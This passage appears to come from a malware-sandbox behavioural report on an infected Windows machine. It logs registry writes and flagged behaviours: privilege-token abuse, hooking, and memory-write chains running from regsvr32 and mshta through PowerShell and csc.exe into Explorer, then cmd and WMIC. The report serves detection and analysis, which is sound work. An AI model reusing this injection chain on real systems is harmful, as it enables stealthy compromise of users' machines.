000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea00000018000000030000000302e91f1000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c61393461623965306132373761313836356430333131316363316137306163393031623530396332346265663737303335616631386165353230336236653337000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a05800000000000000616571746e6278660000000000000000e8e75957008b3b4391fdaad1e6dbb00ca290d4e8e908ed11bfb6f65c4439900fe8e75957008b3b4391fdaad1e6dbb00ca290d4e8e908ed11bfb6f65c4439900fce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d0032003300370032003500360034003700320032002d003100390033003500320036003700330034002d0032003600330036003500350036003100380032002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d00000068000000004800000052a0c1bb000000000000d01200000000000000000000000000000000 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\06c865ff-b5f4-4ab0- = ffa4c19238a7d801 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\79f94f1f-3f21-40df- = 449ce29238a7d801 C:\Windows\System32\RuntimeBroker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\575f4703-32d0-4b71- C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\575f4703-32d0-4b71- = "8324" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\06c865ff-b5f4-4ab0- = "8324" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\06c865ff-b5f4-4ab0- = "0" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\00cb9779-6dd6-4adc- = b1d97d9238a7d801 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\74b15d46-b4f0-4fbb- = "0" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\06c865ff-b5f4-4ab0- = "\\\\?\\Volume{BBC1A052-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\7df64d0b8ce57658894b87824f6c7365f089fc082206dc50325f02b2cbfacdea" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\00cb9779-6dd6-4adc- = "0" C:\Windows\System32\RuntimeBroker.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\0d724897-1082-4cb9- C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\00cb9779-6dd6-4adc- = "\\\\?\\Volume{BBC1A052-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\bf9b381c0f6d6c6843c6e75b141b29022c99e5eaf9ba7bd4b11b59983bec26d6" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\575f4703-32d0-4b71- C:\Windows\System32\RuntimeBroker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\79f94f1f-3f21-40df- C:\Windows\System32\RuntimeBroker.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\33c0dd8d-a0ef-4efa- C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\575f4703-32d0-4b71- = dd0d9f9238a7d801 C:\Windows\System32\RuntimeBroker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\06c865ff-b5f4-4ab0- C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\06c865ff-b5f4-4ab0- = 0114020000000000c0000000000000464c0000000114020000000000c00000000000004683000000200000002f45ea7f38a7d8018f66709238a7d8018f66709238a7d801116d10000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad0132000000000003551a672000376466363464306238636535373635383839346238373832346636633733363566303839666330383232303664633530333235663032623263626661636465610000b20009000400efbe03551a6703551a672e0000000000000000000000000000000000000000000000000052d5dc00370064006600360034006400300062003800630065003500370036003500380038003900340062003800370038003200340066003600630037003300360035006600300038003900660063003000380032003200300036006400630035003000330032003500660030003200620032006300620066006100630064006500610000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea00000018000000030000000302e91f1000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c37646636346430623863653537363538383934623837383234663663373336356630383966633038323230366463353033323566303262326362666163646561000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a05800000000000000616571746e6278660000000000000000e8e75957008b3b4391fdaad1e6dbb00ca490d4e8e908ed11bfb6f65c4439900fe8e75957008b3b4391fdaad1e6dbb00ca490d4e8e908ed11bfb6f65c4439900fce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d0032003300370032003500360034003700320032002d003100390033003500320036003700330034002d0032003600330036003500350036003100380032002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d00000068000000004800000052a0c1bb000000000000d01200000000000000000000000000000000 C:\Windows\System32\RuntimeBroker.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\6781d2d3-a64b-43be- C:\Windows\System32\RuntimeBroker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable C:\Windows\System32\RuntimeBroker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\d8b325ff-b8d9-4e3d- C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\d8b325ff-b8d9-4e3d- = 0114020000000000c0000000000000464c0000000114020000000000c000000000000046830000002000000040a8ae7f38a7d801d67d269238a7d801d67d269238a7d801669907000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad0132000000000003551a672000303731616533306263373336353639396430343461373562613831393165346439633339323030666332376238353635643838646165316563383730313364340000b20009000400efbe03551a6703551a672e00000000000000000000000000000000000000000000000000980fd800300037003100610065003300300062006300370033003600350036003900390064003000340034006100370035006200610038003100390031006500340064003900630033003900320030003000660063003200370062003800350036003500640038003800640061006500310065006300380037003000310033006400340000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea00000018000000030000000302e91f1000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c30373161653330626337333635363939643034346137356261383139316534643963333932303066633237623835363564383864616531656338373031336434000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a05800000000000000616571746e6278660000000000000000e8e75957008b3b4391fdaad1e6dbb00c9f90d4e8e908ed11bfb6f65c4439900fe8e75957008b3b4391fdaad1e6dbb00c9f90d4e8e908ed11bfb6f65c4439900fce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d0032003300370032003500360034003700320032002d003100390033003500320036003700330034002d0032003600330036003500350036003100380032002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d00000068000000004800000052a0c1bb000000000000d01200000000000000000000000000000000 C:\Windows\System32\RuntimeBroker.exe N/A

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3088 wrote to memory of 1952 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 3088 wrote to memory of 1952 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 3088 wrote to memory of 1952 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 852 wrote to memory of 1728 N/A C:\Windows\System32\mshta.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 852 wrote to memory of 1728 N/A C:\Windows\System32\mshta.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1728 wrote to memory of 2004 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 1728 wrote to memory of 2004 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 2004 wrote to memory of 4544 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 2004 wrote to memory of 4544 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 1728 wrote to memory of 4568 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 1728 wrote to memory of 4568 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 4568 wrote to memory of 3680 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 4568 wrote to memory of 3680 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 1728 wrote to memory of 2588 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Explorer.EXE
PID 1728 wrote to memory of 2588 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Explorer.EXE
PID 1728 wrote to memory of 2588 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Explorer.EXE
PID 1728 wrote to memory of 2588 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Explorer.EXE
PID 2588 wrote to memory of 3396 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 2588 wrote to memory of 3396 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 2588 wrote to memory of 3396 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 2588 wrote to memory of 3396 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 2588 wrote to memory of 3664 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 2588 wrote to memory of 3664 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 2588 wrote to memory of 3664 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 2588 wrote to memory of 3664 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 2588 wrote to memory of 3520 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 2588 wrote to memory of 3520 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 2588 wrote to memory of 3520 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 2588 wrote to memory of 3520 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 2588 wrote to memory of 4584 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 2588 wrote to memory of 4584 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 2588 wrote to memory of 4752 N/A C:\Windows\Explorer.EXE C:\Windows\syswow64\cmd.exe
PID 2588 wrote to memory of 4752 N/A C:\Windows\Explorer.EXE C:\Windows\syswow64\cmd.exe
PID 2588 wrote to memory of 4752 N/A C:\Windows\Explorer.EXE C:\Windows\syswow64\cmd.exe
PID 2588 wrote to memory of 4752 N/A C:\Windows\Explorer.EXE C:\Windows\syswow64\cmd.exe
PID 4584 wrote to memory of 3344 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 4584 wrote to memory of 3344 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 4584 wrote to memory of 1984 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\more.com
PID 4584 wrote to memory of 1984 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\more.com
PID 2588 wrote to memory of 4752 N/A C:\Windows\Explorer.EXE C:\Windows\syswow64\cmd.exe
PID 2588 wrote to memory of 4752 N/A C:\Windows\Explorer.EXE C:\Windows\syswow64\cmd.exe
PID 2588 wrote to memory of 4372 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 2588 wrote to memory of 4372 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 2588 wrote to memory of 2816 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 2588 wrote to memory of 2816 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
